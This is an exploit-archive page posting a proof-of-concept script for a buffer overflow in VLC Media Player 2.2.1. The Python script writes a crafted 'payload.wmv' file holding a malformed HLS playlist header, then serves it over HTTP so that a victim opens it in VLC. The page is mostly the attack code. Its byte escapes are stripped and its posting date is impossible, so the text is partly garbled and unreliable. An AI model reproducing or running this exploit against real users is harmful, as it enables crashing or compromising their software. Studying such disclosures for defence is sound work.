Home / exploitsPDF  

VLC Media Player 2.2.1 Buffer Overflow

Posted on 30 November -0001

<HTML><HEAD><TITLE>VLC Media Player 2.2.1 Buffer Overflow</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>Exploit Title: VLC Media Player 2.2.1 Buffer Overflow 2016-09-28 Author: sultan albalawi Software Link: https://www.videolan.org/vlc/releases/2.2.1.html Tested on:win7 video :https://www.facebook.com/pentest3/videos/vb.100012552940568/189735791454851/?type=2&theater&notif_t=video_processed&notif_id=1475012468070044 ************************************************************************************* filecreate = "payload.wmv" # create file (payload.wmv) buffer = ("x23x45x58x54x4dx33x55 x23"+ "x45x58x54x2dx58x2dx53x54x52"+ "x45x41x4dx2dx49x4ex46x3ax50"+ "x52x4fx47x52x41x4dx2dx49x44"+ "x3dx31x2cx42x41x4ex44x57x49"+ "x44x54x48x3dx31x2cx52x45x53"+ "x4fx4cx55x54x49x4fx4ex3dx31"+ "x32x30x78x33x36x30 ") buffer += filecreate open(filecreate, "wb").write(buffer) print "create file done {}".format(filecreate) import BaseHTTPServer import sys from SimpleHTTPServer import SimpleHTTPRequestHandler HandlerClass = SimpleHTTPRequestHandler ServerClass = BaseHTTPServer.HTTPServer Protocol = "HTTP/1.0" if sys.argv[1:]: port = int(sys.argv[1]) else: port =8080 server_address = ('192.168.100.3',8080) HandlerClass.protocol_version = Protocol httpd = ServerClass(server_address, HandlerClass) sa = httpd.socket.getsockname() print sa[0],sa[1],filecreate print "open vlc and open file {}".format(filecreate) print "LISTENING..",sa[0],sa[1],filecreate httpd.serve_forever() </BODY></HTML>

 

TOP